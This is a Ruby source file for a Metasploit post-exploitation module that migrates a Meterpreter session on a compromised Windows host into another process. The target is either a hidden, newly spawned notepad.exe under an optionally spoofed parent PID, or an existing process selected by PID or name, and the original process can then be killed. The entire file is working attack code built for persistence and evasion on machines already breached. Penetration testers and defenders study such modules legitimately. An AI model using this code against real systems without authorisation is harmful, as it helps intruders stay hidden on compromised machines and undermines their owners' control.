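##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that moves a Meterpreter session into another process, either a
# freshly spawned notepad.exe (optionally with a spoofed parent PID) or an
# existing process selected by PID or name. Option precedence is SPAWN, then
# PID, then NAME; because SPAWN defaults to true, PID/NAME are only honoured
# when SPAWN is explicitly set to false.
class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Process Migration',
        'Description' => %q{
          This module will migrate a Meterpreter session from one process
          to another. A given process PID to migrate to or the module can spawn one and
          migrate to that newly spawned process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'phra <https://iwantmore.pizza>'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_migrate
              stdapi_sys_config_getenv
              stdapi_sys_process_attach
              stdapi_sys_process_execute
              stdapi_sys_process_kill
            ]
          }
        }
      )
    )

    register_options(
      [
        OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),
        OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),
        OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
        OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
        OptString.new('NAME', [false, 'Name of process to migrate to.']),
        OptBool.new('KILL', [false, 'Kill original process for the session.', false])
      ]
    )
  end

  # Entry point for the `run` command.
  #
  # Resolves the migration target from the datastore, migrates the session
  # and, when KILL is set, terminates the process the session came from.
  # The kill is only attempted after a successful migration: if migration
  # failed the session still lives in the original process, and killing it
  # would kill the session itself.
  def run
    print_status("Running module against #{sysinfo['Computer']}")

    # With no argument `open` refers to the current (server) process.
    server = session.sys.process.open
    original_pid = server.pid
    print_status("Current server process: #{server.name} (#{server.pid})")

    target_pid = resolve_target_pid

    if !target_pid || !has_pid?(target_pid)
      print_error("Process #{target_pid} not found")
      return
    end

    # Migrating into the process we already live in is never useful and
    # would otherwise be reported as a failure by the migrate request.
    if target_pid == original_pid
      print_error("Process #{target_pid} is already the current server process")
      return
    end

    migrated = false
    begin
      print_status("Migrating into #{target_pid}")
      session.core.migrate(target_pid)
      migrated = true
      print_good("Successfully migrated into process #{target_pid}")
    rescue ::StandardError, ::Rex::TimeoutError => e
      # Deliberately not `rescue ::Exception`: a user interrupt (Ctrl-C)
      # must not be swallowed and then followed by the KILL step below.
      print_error('Could not migrate into process')
      print_error("Exception: #{e.class} : #{e}")
    end

    return unless datastore['KILL']

    unless migrated
      print_warning("Migration failed; not killing PID #{original_pid} because the session still runs inside it")
      return
    end

    print_status("Killing original process with PID #{original_pid}")
    if has_pid?(original_pid)
      session.sys.process.kill(original_pid)
      print_good("Successfully killed process with PID #{original_pid}")
    else
      print_warning("PID #{original_pid} exited on its own")
    end
  end

  # Picks the migration target from the datastore in priority order:
  # SPAWN (new notepad.exe), then PID, then NAME (first process with that
  # name). Returns a PID, or nil when nothing was selected or the spawn
  # failed.
  def resolve_target_pid
    if datastore['SPAWN'] && (datastore['SPAWN'] != '')
      create_temp_proc
    elsif datastore['PID'] && (datastore['PID'] != 0)
      datastore['PID']
    elsif datastore['NAME'] && (datastore['NAME'] != '')
      session.sys.process[datastore['NAME']]
    end
  end

  # Spawns a hidden notepad.exe (System32/SysWOW64/Sysnative chosen by the
  # session architecture) to migrate into, optionally under a spoofed
  # parent taken from PPID_NAME (first matching process) or PPID.
  #
  # Returns the new process PID, or nil when the requested parent process
  # does not exist.
  def create_temp_proc
    target_ppid = nil
    ppid_name = datastore['PPID_NAME']
    # Only look a parent up by name when one was actually supplied, so an
    # empty option never reaches the name lookup.
    if ppid_name && !ppid_name.empty?
      target_ppid = session.sys.process[ppid_name]
    end
    target_ppid ||= datastore['PPID']

    cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

    print_status('Spawning notepad.exe process to migrate into')

    # 0 means "no spoofing" by contract of the PPID option. It is checked
    # explicitly rather than via has_pid?(0), since PID 0 (System Idle
    # Process) is present in the process list on Windows and would
    # otherwise be reported as a spoofed parent.
    if target_ppid != 0
      unless has_pid?(target_ppid)
        print_error("Process #{target_ppid} not found")
        return nil
      end
      print_status("Spoofing PPID #{target_ppid}")
    end

    # run hidden
    proc = session.sys.process.execute(cmd, nil, {
      'Hidden' => true,
      'ParentPid' => target_ppid
    })

    proc.pid
  end
end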